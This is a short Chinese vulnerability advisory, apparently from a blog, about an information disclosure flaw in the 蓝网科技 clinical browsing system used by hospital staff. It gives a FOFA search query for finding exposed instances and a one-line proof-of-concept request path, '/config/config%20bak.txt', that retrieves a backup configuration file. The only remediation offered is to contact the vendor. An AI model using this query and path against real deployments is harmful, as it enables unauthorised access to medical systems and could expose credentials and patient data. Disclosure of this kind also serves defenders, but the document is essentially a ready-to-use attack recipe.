Nx01 产品简介
蓝网科技临床浏览系统是一个专门用于医疗行业的软件系统,主要用于医生、护士和其他医疗专业人员在临床工作中进行信息浏览、查询和管理。
Nx02 漏洞描述
蓝网科技临床浏览系统存在信息泄露漏洞,攻击者可以利用该漏洞获取敏感信息。
Nx03 产品主页
fofa-query: title=="临床浏览"
Nx04 漏洞复现
POC:
/config/config%20bak.txt
Nx05 修复建议
建议联系软件厂商进行处理。
相关推荐
The Sheep 20237 小时前
Vue复习上海云盾-小余7 小时前
接口高频恶意刷取怎么防?网关限流搭配 WAF 联合防护方案潜创微科技8 小时前
4K60 over IP 方案简介treesforest8 小时前
自媒体账号限流排查指南:从风控算法视角看IP纯净度与网络隔离pride.li8 小时前
海思视觉Hi3516CV610--开机自动设置ip源图客8 小时前
Minio配置HTTPS服务修炼室8 小时前
外网环境原生直连校内服务器:基于内网穿透 + SSH 密钥认证的完整实践指南Titan20249 小时前
Linux动静态库j_xxx404_9 小时前
MySQL表操作硬核解析:从 CREATE TABLE 到磁盘文件、ALTER TABLE 与 DDL 风险持敬chijing10 小时前
Web渗透之SQL注入-二次注入(Second-Order SQL Injection)